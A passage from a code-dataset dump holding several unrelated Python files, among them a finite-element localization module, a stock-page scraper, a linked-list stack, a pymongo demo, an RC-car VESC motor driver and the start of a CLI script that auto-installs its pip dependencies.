NumpyVectorSpace\nfrom lmor.localizer import NumpyLocalizer\nfrom lmor.partitioner import build_subspaces, partition_any_grid\nfrom lmor.discrete_pou import localized_pou\nimport numpy as np\nimport copy\n\n\ndef create_dirichlet_transfer(localizer, local_op, rhsop, source_space, training_space, range_space, pou):\n # Dirichlet-Transferoperator\n def transfer(va):\n range_solution = localizer.to_space(\n local_op.apply_inverse(-rhsop.apply(NumpyVectorSpace.make_array(va))), training_space, range_space)\n return pou[range_space](range_solution).data\n cavesize = len(localizer.join_spaces(source_space))\n rangesize = len(localizer.join_spaces(range_space))\n return NumpyGenericOperator(transfer, dim_source=cavesize, dim_range=rangesize, linear=True)\n\n\ndef create_dirichlet_solop(localizer, local_op, rhsop, source_space, training_space):\n # Dirichlet-Loesungsoperator\n def solve(va):\n solution = local_op.apply_inverse(-rhsop.apply(NumpyVectorSpace.make_array(va)))\n return solution.data\n cavesize = len(localizer.join_spaces(source_space))\n rangesize = len(localizer.join_spaces(training_space))\n return NumpyGenericOperator(solve, dim_source=cavesize, dim_range=rangesize, linear=True)\n\n\ndef create_robin_transfer(localizer, bilifo, source_space, omega_star_space, range_space, pou):\n # Robin-Transferoperator\n def transfer(va):\n g = localizer.to_space(NumpyVectorSpace.make_array(va), source_space, omega_star_space)\n solution = bilifo.apply_inverse(g)\n range_solution = localizer.to_space(solution, omega_star_space, range_space)\n return pou[range_space](range_solution).data\n cavesize = len(localizer.join_spaces(source_space))\n rangesize = len(localizer.join_spaces(range_space))\n return NumpyGenericOperator(transfer, dim_source=cavesize, dim_range=rangesize, linear=True)\n\n\ndef create_robin_solop(localizer, bilifo, source_space, omega_star_space):\n # Robin-Loesungsoperator\n def solve(va):\n g = localizer.to_space(NumpyVectorSpace.make_array(va), source_space, omega_star_space)\n solution = bilifo.apply_inverse(g)\n return solution.data\n cavesize = len(localizer.join_spaces(source_space))\n rangesize = len(localizer.join_spaces(omega_star_space))\n return NumpyGenericOperator(solve, dim_source=cavesize, dim_range=rangesize, linear=True)\n\n\ndef localize_problem(p, coarse_grid_resolution, fine_grid_resolution, mus=None, calT=False,\n calTd=False, calQ=False, dof_codim=2, localization_codim=2, discretizer=None, m=1):\n\n assert coarse_grid_resolution > (m+1)*2\n assert fine_grid_resolution % coarse_grid_resolution == 0\n\n print(\"localizing problem\")\n global_quantities = {}\n global_quantities[\"coarse_grid_resolution\"] = coarse_grid_resolution\n local_quantities = {}\n\n # Diskretisierung auf dem feinen Gitter:\n diameter = 1./fine_grid_resolution\n global_quantities[\"diameter\"] = diameter\n if discretizer is None:\n discretizer = discretize_stationary_cg\n d, data = discretizer(p, diameter=diameter)\n grid = data[\"grid\"]\n\n global_quantities[\"d\"] = d\n global_quantities[\"data\"] = data\n\n global_operator = d.operator.assemble(mus)\n global_quantities[\"op\"] = global_operator\n global_quantities[\"op_not_assembled\"] = d.operator\n global_rhs = d.rhs.assemble(mus)\n global_quantities[\"rhs\"] = global_rhs\n\n op_fixed = copy.deepcopy(d.operator)\n\n # Skalierung der Dirichlet-Freiheitsgrade:\n try:\n dirichlet_dofs = data['boundary_info'].dirichlet_boundaries(dof_codim)\n for op in op_fixed.operators:\n op.assemble(mus).matrix[dirichlet_dofs, dirichlet_dofs] *= 1e5\n # d.rhs.assemble(mus)._matrix[:, dirichlet_dofs] *= 1e5\n except KeyError:\n pass\n\n global_operator_fixed = op_fixed.assemble(mus)\n global_quantities[\"op_fixed\"] = global_operator_fixed\n global_quantities[\"op_fixed_not_assembled\"] = op_fixed\n\n global_quantities[\"p\"] = p\n\n try:\n dmask = data['boundary_info'].dirichlet_mask(dof_codim)\n except KeyError:\n dmask = None\n\n # Konstruktion der Teilraeume:\n subspaces, subspaces_per_codim = build_subspaces(\n *partition_any_grid(grid, num_intervals=(coarse_grid_resolution, coarse_grid_resolution),\n dmask=dmask, codim=dof_codim))\n global_quantities[\"subspaces\"] = subspaces\n global_quantities[\"subspaces_per_codim\"] = subspaces_per_codim\n localizer = NumpyLocalizer(d.solution_space, subspaces['dofs'])\n global_quantities[\"localizer\"] = localizer\n\n def create_m_patch(xspace, m):\n for i in range(m):\n space = xspace\n cspace = tuple(set(i for k in space if subspaces[k]['codim']\n == 0 for i in subspaces[k]['cpatch'] if i not in space))\n xspace = tuple(set(i for k in cspace if subspaces[k]['codim']\n == 1 for i in subspaces[k]['env']) | set(space))\n cxspace = tuple(set(i for k in xspace if subspaces[k]['codim']\n == 0 for i in subspaces[k]['cpatch'] if i not in xspace))\n return xspace, cxspace\n\n pou = localized_pou(subspaces, subspaces_per_codim, localizer,\n coarse_grid_resolution, grid, localization_codim, dof_codim)\n global_quantities[\"pou\"] = pou\n spaces = [subspaces[s_id][\"env\"] for s_id in subspaces_per_codim[2]]\n global_quantities[\"spaces\"] = spaces\n\n full_l2_product = d.products[\"l2\"].assemble()\n full_h1_semi_product = d.products[\"h1_semi\"].assemble()\n k_product = LincombOperator((full_h1_semi_product, full_l2_product), (1, mus[\"k\"]**2)).assemble()\n global_quantities[\"full_norm\"] = induced_norm(k_product)\n global_quantities[\"k_product\"] = k_product\n for xpos in range(coarse_grid_resolution-1):\n for ypos in range(coarse_grid_resolution-1):\n # print \"localizing...\"\n s_id = subspaces_per_codim[localization_codim][ypos + xpos*(coarse_grid_resolution-1)]\n space = subspaces[s_id][\"env\"]\n ldict = {}\n local_quantities[space] = ldict\n ldict[\"pos\"] = (xpos, ypos)\n\n # Konstruktion der lokalen Raeume:\n range_space = subspaces[s_id][\"env\"]\n ldict[\"range_space\"] = range_space\n omega_space = tuple(sorted(set(subspaces[s_id]['env']) | set(subspaces[s_id]['cenv'])))\n ldict[\"omega_space\"] = omega_space\n training_space, source_space = create_m_patch(range_space, m)\n # source_space = subspaces[s_id][\"cxenv\"]\n ldict[\"source_space\"] = source_space\n # training_space = subspaces[s_id][\"xenv\"]\n ldict[\"training_space\"] = training_space\n omega_star_space = tuple(sorted(set(training_space) | set(source_space)))\n ldict[\"omega_star_space\"] = omega_star_space\n\n # lokale Shift-Loesung mit f(Dirichlet)\n local_op = localizer.localize_operator(global_operator, training_space, training_space)\n local_rhs = localizer.localize_operator(global_rhs, None, training_space)\n local_solution = local_op.apply_inverse(local_rhs.as_range_array())\n local_solution = localizer.to_space(local_solution, training_space, range_space)\n local_solution = pou[range_space](local_solution)\n ldict[\"local_solution_dirichlet\"] = local_solution\n\n # Dirichlet Transferoperator:\n rhsop = localizer.localize_operator(global_operator, training_space, source_space)\n transop_dirichlet = create_dirichlet_transfer(\n localizer, local_op, rhsop, source_space, training_space, range_space, pou)\n ldict[\"dirichlet_transfer\"] = transop_dirichlet\n\n # subgrid\n xmin = max(0, xpos - m)\n xsize = min(xpos + 2+m, coarse_grid_resolution) - xmin\n ymin = max(0, ypos - m)\n ysize = min(ypos + 2+m, coarse_grid_resolution) - ymin\n ldict[\"posext\"] = [(xmin/coarse_grid_resolution, ymin/coarse_grid_resolution),\n ((xmin+xsize)/coarse_grid_resolution, (ymin+ysize)/coarse_grid_resolution)]\n mysubgrid = getsubgrid(grid, xmin, ymin, coarse_grid_resolution, xsize=xsize, ysize=ysize)\n mysubbi = SubGridBoundaryInfo(mysubgrid, grid, data['boundary_info'], 'robin')\n ld, ldata = discretizer(p, grid=mysubgrid, boundary_info=mysubbi)\n lop = ld.operator.assemble(mus)\n\n # index conversion\n ndofsext = len(ldata['grid'].parent_indices(dof_codim))\n global_dofnrsext = -100000000 * np.ones(shape=(d.solution_space.dim,))\n global_dofnrsext[ldata['grid'].parent_indices(dof_codim)] = np.array(range(ndofsext))\n lvecext = localizer.localize_vector_array(\n NumpyVectorSpace.make_array(global_dofnrsext), omega_star_space).data[0]\n\n # Robin Transferoperator:\n bilifo = NumpyMatrixOperator(lop.matrix[:, lvecext][lvecext, :])\n transop_robin = create_robin_transfer(localizer, bilifo, source_space, omega_star_space, range_space, pou)\n ldict[\"robin_transfer\"] = transop_robin\n\n # lokale Shift-Loesung mit f(Robin)\n lrhs = ld.rhs.assemble(mus)\n llrhs = NumpyMatrixOperator(lrhs.matrix[lvecext.astype(int)])\n local_solution = bilifo.apply_inverse(llrhs.as_range_array())\n ldict[\"local_sol2\"] = local_solution\n local_solution = localizer.to_space(local_solution, omega_star_space, range_space)\n local_solution_pou = pou[range_space](local_solution)\n ldict[\"local_solution_robin\"] = local_solution_pou\n\n if calT:\n # Transfer-Matrix:\n ldict[\"transfer_matrix_robin\"] = transop_robin.as_range_array().data.T\n\n if calTd:\n # Transfer-Matrix:\n ldict[\"transfer_matrix_dirichlet\"] = transop_dirichlet.as_range_array().data.T\n\n # Konstruktion der Produkte:\n range_k = localizer.localize_operator(k_product, range_space, range_space)\n omstar_k = LincombOperator((\n NumpyMatrixOperator(ld.products[\"h1_semi\"].assemble().matrix[:, lvecext][lvecext, :]),\n NumpyMatrixOperator(ld.products[\"l2\"].assemble().matrix[:, lvecext][lvecext, :])),\n (1, mus[\"k\"]**2)).assemble()\n\n ldict[\"omega_star_product\"] = omstar_k\n ldict[\"range_product\"] = range_k\n\n if calQ:\n # Loesungs-Matrix:\n solution_op_robin = create_robin_solop(localizer, bilifo, source_space, omega_star_space)\n Q_r = solution_op_robin.as_range_array()\n ldict[\"solution_matrix_robin\"] = Q_r.data.T\n source_Q_r_product = NumpyMatrixOperator(omstar_k.apply(Q_r).data.T)\n ldict[\"source_product\"] = source_Q_r_product\n\n lproduct = localizer.localize_operator(full_l2_product, source_space, source_space)\n lmat = lproduct.matrix.tocoo()\n lmat.data = np.array([4./6. * diameter if (row == col) else diameter / 6.\n for row, col in zip(lmat.row, lmat.col)])\n ldict[\"source_product\"] = NumpyMatrixOperator(lmat.tocsc().astype(np.cfloat))\n\n return global_quantities, local_quantities\n\n\ndef getsubgrid(grid, xpos, ypos, coarse_grid_resolution, xsize=2, ysize=2):\n assert 0 <= xpos <= coarse_grid_resolution - 2\n assert 0 <= ypos <= coarse_grid_resolution - 2\n\n xstep = float(grid.domain[1][0] - grid.domain[0][0])/coarse_grid_resolution\n ystep = float(grid.domain[1][1] - grid.domain[0][1])/coarse_grid_resolution\n\n xmin = grid.domain[0][0] + xpos*xstep\n xmax = xmin + xsize*xstep\n\n ymin = grid.domain[0][1] + ypos * ystep\n ymax = ymin + ysize*ystep\n\n def filter(elem):\n return (xmin <= elem[0] <= xmax) and (ymin <= elem[1] <= ymax)\n\n mask = [filter(e) for e in grid.centers(0)]\n indices = np.nonzero(mask)[0]\n return SubGrid(grid, indices)\n","sub_path":"src/lmor/localize_problem.py","file_name":"localize_problem.py","file_ext":"py","file_size_in_byte":12501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"837342","text":"from features.steps.deciders import ArgonautObservationDecider\nfrom tests.testvitals import VitalsResource\nfrom features.steps.argonaut import found_at_least_one\n\n\ndef test_argonaut_validation():\n resources = VitalsResource().get_resources()\n\n assert ArgonautObservationDecider(resources[0]).should_validate()\n assert not ArgonautObservationDecider(resources[1]).should_validate()\n\n\ndef test_found_one():\n resources = VitalsResource().get_resources()\n\n resource_path = \"Observation.category.coding.code\".split(\".\")\n resource_path.pop(0)\n\n fake_resource = resources[0]\n\n assert found_at_least_one([fake_resource], resource_path, \"vital-signs\")\n\n fake_resource[\"category\"][\"coding\"][0][\"code\"] = \"not-vital-signs\"\n\n assert not found_at_least_one([fake_resource], resource_path, \"vital-signs\")\n","sub_path":"tests/test_steps.py","file_name":"test_steps.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"180854649","text":"from bs4 import BeautifulSoup as soup\nfrom urllib.request import urlopen as uReq\n\nmy_url = \"https://in.tradingview.com/markets/stocks-india/market-movers-losers/\"\n\nuClient = uReq(my_url)\npage_html = uClient.read()\nuClient.close()\n\n\npage_soup = soup(page_html,\"html.parser\")\n\ncontainers = page_soup.findAll(\"tr\",{\"class\":\"tv-data-table__row tv-data-table__stroke tv-screener-table__result-row\"})\ncount = 0\n\nfilename = \"toploss.csv\"\nf = open(filename,\"w\")\nheaders = \"company,Close_val,Perc_inc,Stockval_change,Market_opinion,Vol_trade,Marketcap \\n\"\nf.write(headers)\n\nfor container in containers:\n count = count + 1\n\n if count == 11:\n break\n else:\n values = container.find_all(\"td\")\n\n i=0\n for value in values:\n i=i+1\n\n if i==1:\n company = value.span.text.strip()\n print(\"company \" + value.span.text.strip())\n\n if i==2:\n Close_val = value.text.strip()\n print(\"Closing Value: \" + value.text.strip())\n\n if i==3:\n Perc_inc = value.text.strip()\n print(\"Perc increase: \" + value.text.strip())\n\n if i==4:\n Stockval_change = value.text.strip()\n print(\"Val Changed: \" + value.text.strip())\n\n if i==5:\n Market_opinion = value.text.strip()\n print(\"Buy Or Sell: \" + value.text.strip())\n\n if i==6:\n Vol_trade = value.text.strip()\n print(\"Vol Traded: \" + value.text.strip())\n\n if i==7:\n Marketcap = value.text.strip()\n print(\"Market Capital: \" + value.text.strip() + \"\\n\")\n\n\n\n f.write(company + \",\" + Close_val + \",\" + Perc_inc + \",\" + Stockval_change + \",\" + Market_opinion + \",\" + Vol_trade + \",\" + Marketcap + \"\\n\")\nf.close()\n","sub_path":"toploss.py","file_name":"toploss.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"261423487","text":"from collections import deque\n\nfrom transducer.infrastructure import Reduced\nfrom transducer.reducers import appending\n\n\n# Transducible processes\n\nasync def transduce(transducer, aiterable):\n r = transducer(appending())\n accumulator = deque()\n reduced = False\n async for item in aiterable:\n accumulator = r.step(accumulator, item)\n if isinstance(accumulator, Reduced):\n accumulator = accumulator.value\n reduced = True\n\n while accumulator:\n yield accumulator.popleft()\n\n if reduced:\n break\n\n completed_result = r.complete(accumulator)\n assert completed_result is accumulator\n\n while accumulator:\n yield accumulator.popleft()\n","sub_path":"transducer/lazy_coop.py","file_name":"lazy_coop.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"309652592","text":"# Command Interface\n# Author: Darren Midkiff <d.claymidkiff@gmail.com>\n# rLoop Software Engineering Team\n\n#dummy value\nnodes = []\n\ndef attach_to_bus():\n return\n\n\ndef collect_logs():\n myLog = open(\"commandInterfaceLog.txt\", \"r\")\n newLog = open(\"log.txt\", \"r+\")\n newLog.write(\"Combined Log\" + \"\\n \\n\" + myLog.read())\n for node in nodes:\n \tnewLog.write(node.get_log() + \"\\n \\n\")\n log = newLog.read()\n myLog.close()\n newLog.close()\n return log\n\ncollect_logs()\n","sub_path":"pod/command_interface/command_interface.py","file_name":"command_interface.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"87542395","text":"# Oving 2 ITGK\r\n# -*- coding: utf8 -*-\r\n\r\n# Oppgave 6 Fibonacci \r\n\r\ndef fibonacci():\r\n\r\n k = int(input(\"Hvor mange Fibonacci-tall vil du regne ut? \"))\r\n f = [0] * (k+1)\r\n f[0] = 0\r\n f[1] = 1\r\n print(f[0])\r\n print(f[1])\r\n sum1 = 1\r\n i = 2\r\n for i in range(i,k+1):\r\n f[i] = f[i-1] + f[i-2]\r\n print(f[i])\r\n sum1 += f[i]\r\n\r\n print(\"Summen av tallene er: \", sum1)\r\n\r\nfibonacci()\r\n\r\n \r\n\r\n","sub_path":"Oving 3/oppgave_6.py","file_name":"oppgave_6.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"295850104","text":"# Simple Stack using a singly-linked list\n\nfrom node import Node\n\n\nclass Stack:\n def __init__(self):\n self.head = None\n self.length = 0\n\n def push(self, cargo):\n my_node = Node(cargo)\n my_node.next = self.head\n self.head = my_node\n self.length += 1\n\n def pop(self):\n # remove node from head of list\n if self.is_empty():\n print('Error: underflow')\n else:\n temp_node = self.head\n self.head = temp_node.next\n temp_node.next = None\n self.length -= 1\n return temp_node.cargo\n\n def search(self, target):\n current = self.head\n while not self.is_empty():\n if current == target:\n return current\n else:\n current = current.next\n\n def is_empty(self):\n return self.length == 0\n\n def print_stack(self):\n # pops and print nodes in the stack\n while not self.is_empty():\n print(self.pop(), \" \")\n\n\nmy_stack = Stack()\narr = [54, 35, 62, 31, 56, 67, 11, 3]\n\nfor items in arr:\n my_stack.push(items)\n\nmy_stack.print_stack()\n\n\n\n","sub_path":"sample/stack1.py","file_name":"stack1.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"192639196","text":"#可用于下拉框也可用于搜索建议\nfrom commonfunc import loadFirefox\ndriver=loadFirefox()\ndriver.get('https://www.baidu.com')\nelement=driver.find_element_by_id('kw')\n\nelement.send_keys('java')\nelement.click()\noverform=driver.find_element_by_xpath(\"//*[@id='form']/div[1]\")\n\noptions_list=overform.find_elements_by_tag_name('li')\nfor option in options_list:\n\tvalue=option.get_attribute(\"data-key\")\n\tprint(value)\n\n#如果是select标签 则直接用select类操作选择\n# myselect=Select(driver.find_element_by_id(\"udp\"))\n# myselect.select_by_visible_text('Audi')\n# myselect=Select(driver.find_element_by_id(\"udp\"))\n# options=myselect.options()\n# for each in options:\n# \tprint(each.text)","sub_path":"BaiduCloud_WEB/Test_Worklist/获取下拉框所有内容.py","file_name":"获取下拉框所有内容.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"5835200","text":"#!/usr/bin/env python3\nimport rospy\nfrom pyvesc import VESC\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import Joy\nfrom rccar_jetson.msg import vesc_feedback\nfrom autoware_msgs.msg import VehicleCmd\nfrom math import *\n\nmeter_per_rotate = 0.330\nwheel_rpm_per_speed = 99.4213/9\nms_per_speed = (meter_per_rotate * wheel_rpm_per_speed) / 60\nspeed_per_ms = 1 / ms_per_speed * 1.3\nwheelbase = 0.320\n\nclass RC_driver():\n def __init__(self):\n self.errCount = 0\n self.max_errCount = 5\n self.serial_port = rospy.get_param('~serial_port','/dev/vesc')\n self.steer_offset = rospy.get_param('~steer_offset', -4.5) \n self.rev_steer_offset = rospy.get_param('~rev_steer_offset',3.8) \n self.wheelbase = rospy.get_param('~wheelbase',0.320)\n self.maxSteer = rospy.get_param('~maxSteer',0.52) # rad\n self.tacho_jitter_threshold = rospy.get_param('~tacho_jitter_threshold',60)\n self.connectVESC()\n self.getInitialTacho()\n self.tacho_err = 0\n self.autoMode = 0\n self.lastMode = 0\n self.steer_rad = 0.0\n self.speed_cmd = 0\n self.steer_cmd = 0\n self.init_tacho = self.set_and_get_vesc(0, 50)\n\n self.feedback_msg = vesc_feedback()\n self.vehiclecmd = VehicleCmd()\n\n self.feedbackPublisher = rospy.Publisher('/vesc_feedback', vesc_feedback, queue_size=1)\n \n # rospy.Subscriber(\"/cmd_vel\",Twist ,self.cmd_velCallback) # auto\n rospy.Subscriber('/vehicle_cmd', VehicleCmd, self.vehiclecmdCallback)\n\n rospy.Subscriber(\"/joy_cmd\",Twist ,self.joy_cmdCallback)\n rospy.Subscriber(\"/joy\",Joy ,self.joyCallback)\n \n \n rospy.sleep(0.05)\n\n def connectVESC(self):\n try:\n self.motor = VESC(serial_port=self.serial_port)\n except Exception as e:\n rospy.logwarn(\"Opening serial failed during init! reconnecting %d times\" % (self.errCount + 1))\n rospy.sleep(3)\n self.handleException(e)\n self.motor = self.connectVESC()\n self.errCount = 0\n\n def getInitialTacho(self):\n try:\n self.init_tacho = self.last_tacho = int(self.motor.get_measurements().tachometer)\n except Exception as e:\n rospy.logwarn(\"Getting initail tacho failed during init! reconnecting %d times\" % (self.errCount + 1))\n rospy.sleep(1)\n self.handleException(e)\n self.getInitialTacho()\n self.errCount = 0\n\n def joyCallback(self, data):\n if data.axes[3] == -1.0:\n if self.lastMode == 0:\n self.speed_cmd = 0\n self.steer_cmd = 0\n self.autoMode = 1\n self.lastMode = 1\n else:\n if self.lastMode == 1:\n self.speed_cmd = 0\n self.steer_cmd = 0\n self.autoMode = 0\n self.lastMode = 0\n\n def vehiclecmdCallback(self, data):\n if self.autoMode == 0:\n return\n lin_cmd = data.ctrl_cmd.linear_velocity\n ang_cmd = data.ctrl_cmd.steering_angle\n self.cal_cmd(lin_cmd, 0)\n self.steer_cmd = degrees(ang_cmd)\n\n def joy_cmdCallback(self, data):\n self.manualCmdLinear = data.linear.x\n self.manualCmdAngular = data.angular.z\n if self.autoMode == 1:\n return\n self.cal_cmd(self.manualCmdLinear, self.manualCmdAngular)\n \n def cmd_velCallback(self, data):\n if self.autoMode == 0:\n return\n self.cal_cmd(data.linear.x, data.angular.z)\n \n def cal_cmd(self, lin_spd, ang_spd):\n # if 0.1 < lin_spd < 0.7:\n # lin_spd = 0.7\n self.speed_cmd = lin_spd * speed_per_ms\n \n if lin_spd != 0:\n self.steer_rad = atan(wheelbase / lin_spd * ang_spd)\n else:\n self.steer_rad = 0\n if self.steer_rad > self.maxSteer:\n self.steer_rad = self.maxSteer\n if self.steer_rad < -self.maxSteer:\n self.steer_rad = -self.maxSteer\n self.feedback_msg.steer.data = self.steer_rad\n self.steer_cmd = degrees(self.steer_rad)\n\n def set_and_get_vesc(self, speed, steer):\n try:\n if speed < 0:\n self.motor.set_servo((50 - steer*1.4 - self.rev_steer_offset) / 100) # 1.8 -> servo/steer(deg)\n # self.motor.set_servo((((self.rev_steer_offset - 27.6) / 30) * steer + (50 - self.rev_steer_offset)) / 100) 잘못됨\n else:\n self.motor.set_servo((50 - steer*1.4 + self.steer_offset) / 100)\n # self.motor.set_servo((((self.steer_offset - 27.6) / 30) * steer + (50 - self.rev_steer_offset)) / 100) 잘못됨\n \n rospy.sleep(0.02)\n self.motor.set_rpm(int(speed*100))\n # motor.set_rpm(1000)\n # motor.set_duty_cycle(speed/100)\n rospy.sleep(0.02)\n measurements = self.motor.get_measurements()\n \n tacho = int(measurements.tachometer)\n D_tacho = tacho - self.last_tacho\n self.last_tacho = tacho\n if abs(D_tacho) > self.tacho_jitter_threshold:\n self.tacho_err += D_tacho\n err;\n tacho -= self.tacho_err\n \n \n except Exception as e:\n self.handleException(e)\n tacho = self.set_and_get_vesc(speed, steer)\n\n self.errCount = 0\n return tacho\n\n def handleException(self,e):\n rospy.logwarn(e)\n self.errCount += 1\n if self.errCount >= self.max_errCount:\n rospy.logerr(\"VESC driver error!\")\n rospy.logerr(e)\n if self.motor.serial_port.is_open:\n self.motor.set_rpm(0)\n rospy.sleep(0.1)\n self.motor.set_servo(0.5)\n rospy.sleep(0.1)\n self.motor.stop_heartbeat()\n rospy.sleep(0.1)\n self.motor.serial_port.flush()\n rospy.sleep(0.1)\n self.motor.serial_port.close()\n err;\n\n\nif __name__ == '__main__':\n rospy.init_node('RC_vesc_driver', anonymous=True)\n driver = RC_driver()\n rate = rospy.Rate(20)\n \n while not rospy.is_shutdown():\n driver.feedback_msg.tacho.data = driver.set_and_get_vesc(driver.speed_cmd, driver.steer_cmd) - driver.init_tacho\n # rospy.loginfo(driver.feedback_msg.tacho.data)\n # rospy.loginfo(\"speed: %f\",driver.speed_cmd)\n driver.feedbackPublisher.publish(driver.feedback_msg)\n rate.sleep()\n \n driver.motor.set_rpm(0)\n rospy.sleep(0.1)\n driver.motor.set_servo(0.5)\n rospy.sleep(0.1)\n driver.motor.stop_heartbeat()\n if driver.motor.serial_port.is_open:\n driver.motor.serial_port.flush()\n driver.motor.serial_port.close()","sub_path":"IROL_RC/rccar_jetson/src/vesc_controller_auto.py","file_name":"vesc_controller_auto.py","file_ext":"py","file_size_in_byte":6835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"276651733","text":"import turtle\n\ndef sier(l, d):\n if d == 0:\n t.begin_fill()\n for i in range(0,3):\n t.fd(l)\n t.left(120)\n t.end_fill()\n\n else:\n sier(l/2,d-1)\n t.fd(l/2)\n sier(l/2,d-1)\n t.bk(l/2)\n t.left(60)\n t.fd(l/2)\n t.right(60)\n sier(l/2,d-1)\n t.left(60)\n t.bk(l/2)\n t.right(60)\n\nwindow = turtle.Screen()\nt = turtle.Turtle()\nt.color(\"blue\",\"green\")\nt.speed(0)\nsier(200,3)\nwindow.exitonclick()\n","sub_path":"python/gadgets/draw_sierpinski_triangle.py","file_name":"draw_sierpinski_triangle.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"79204472","text":"from pymongo import MongoClient\n\n\nclient = MongoClient('127.0.0.1', 27017)\n\n# # 查看链接信息\n# print(client.address)\n# print(client.database_names())\n\n# 创建数据库对象\ndb = client['python5']\n# 创建集合对象\ncol = db['test']\n\n# # 插入数据\n# col.insert({'data': 1})\n# col.insert([{'name': 'xiao', 'age': 12}, {'name': 'zhang', 'age': 19}])\n\n# # find获得游标对象\n# temp = col.find()\n# for data in temp:\n# print(data)\n\n# # 查询一个\n# data = col.find_one()\n# print(data)\n\n# # 删除数据\n# col.remove({'data': 1})\n# temp = col.find()\n# for data in temp:\n# print(data)\n\n# 更新\ncol.update({'name': 'bob'}, {'$set': {'age': 20}}, upsert=True)\ntemp = col.find()\nfor data in temp:\n print(data)\n\n# print(db.collection_names())\n\n","sub_path":"14_pymongo_test.py","file_name":"14_pymongo_test.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"132267305","text":"#!/usr/bin/env python3\n\n#[of]:imports\nimport os\nimport sys\nimport re\n\nimport datetime\n\n#[of]:imports with auto pkg update\nimport pkg_resources\nfrom distutils.version import LooseVersion\n#[of]:import py/yaml\nif len(sys.argv) > 1 and sys.argv[1] == \"--module_installed_pyyaml\":\n sys.argv.pop(1)\n try:\n pkg_version = pkg_resources.get_distribution(\"pyyaml\").version\n except pkg_resources.DistributionNotFound:\n sys.exit(\"\"\"We were unable to auto-install dependencies please run and investigate:\n pip3 install --upgrade --user pyyaml\"\"\")\nelse:\n try:\n pkg_version = pkg_resources.get_distribution(\"pyyaml\").version\n except pkg_resources.DistributionNotFound:\n os.system('pip3 install --upgrade --user pyyaml' + \"> /dev/null 2>&1\")\n sys.argv.insert(1,\"--module_installed_pyyaml\")\n os.execl(sys.executable, sys.executable, * sys.argv)\nif LooseVersion(pkg_version) < LooseVersion(\"5.1\"):\n sys.exit(\"\"\"We were unable to auto-install pyyaml >= 5.1 please run and investigate:\n pip3 install --upgrade --user pyyaml\"\"\")\n\nimport yaml\n#[cf]\n#[of]:import requests\nif len(sys.argv) > 1 and sys.argv[1] == \"--module_installed_requests\":\n sys.argv.pop(1)\n try:\n pkg_version = pkg_resources.get_distribution(\"requests\").version\n except pkg_resources.DistributionNotFound:\n print(\"e1 \" + str(sys.argv))\n sys.exit(\"\"\"We were unable to auto-install dependencies please run and investigate:\n pip3 install --upgrade --user requests\"\"\")\nelse:\n try:\n pkg_version = pkg_resources.get_distribution(\"requests\").version\n except pkg_resources.DistributionNotFound:\n print(\"e2 \" + str(sys.argv))\n os.system('pip3 install --upgrade --user requests' + \"> /dev/null 2>&1\")\n sys.argv.insert(1,\"--module_installed_requests\")\n os.execl(sys.executable, sys.executable, * sys.argv)\nif LooseVersion(pkg_version) < LooseVersion(\"2.22\"):\n print(\"e3 \" + str(sys.argv))\n sys.exit(\"\"\"We were unable to auto-install requests >= 2.22 please run and investigate:\n pip3 install --upgrade --user requests\"\"\")\n\nimport requests\n#[cf]\n#[cf]\n\nimport base64\n\nimport shlex\nimport time\nimport argparse\nimport configparser\nfrom configparser import RawConfigParser as ConfigParser, NoSectionError, NoOptionError\n\nimport json\n\n#[cf]\n#[of]:functions\n#[of]:rest\ndef to_yaml(data):\n return yaml.safe_dump(data, indent=2, default_flow_style=False, explicit_start=True)\ndef to_json(data):\n return json.dumps(data)\n#[cf]\n#[of]:web\n#[of]:def http_get(path)\\:\ndef http_get(path):\n return http_req('GET', path, None)\n#[cf]\n#[of]:def http_post(path, body=None)\\:\ndef http_post(path, body=None):\n return http_req('POST', path, body)\n#[cf]\n#[of]:def http_put(path, body=None)\\:\ndef http_put(path, body=None):\n return http_req('PUT', path, body)\n#[cf]\n#[of]:def http_delete(path)\\:\ndef http_delete(path):\n return http_req('DELETE', path, None)\n#[cf]\n#[of]:def http_req(method, path, body)\ndef http_req(method, path, body):\n DEFAULT_TIMEOUT = 300\n DEFAULT_RETRY_AFTER_SECONDS = 5\n MAX_RETRIES = DEFAULT_TIMEOUT / DEFAULT_RETRY_AFTER_SECONDS\n\n for _ in range(int(MAX_RETRIES)):\n try:\n res = requests.request(method, path, headers=http_headers(), data=body, timeout=DEFAULT_TIMEOUT)\n if str(res.status_code) in ('423', '409', '422'):\n raise ResourceBusy(res, path)\n if str(res.status_code) in ('429'):\n raise RateLimited(res, path)\n if re.search('^2\\d\\d', str(res.status_code)) is None:\n raise HttpRequestError(res, path)\n except RateLimited:\n print(\"Rate limited, retrying in \" + str(DEFAULT_RETRY_AFTER_SECONDS) + \" seconds\")\n time.sleep(DEFAULT_RETRY_AFTER_SECONDS)\n continue\n except ResourceBusy:\n print(\"Resource busy, retrying in \" + str(DEFAULT_RETRY_AFTER_SECONDS) + \" seconds\")\n time.sleep(DEFAULT_RETRY_AFTER_SECONDS)\n continue\n except requests.exceptions.ConnectionError as errc:\n print(\"Error Connecting:\",errc)\n sys.exit(1)\n # except HttpRequestError as 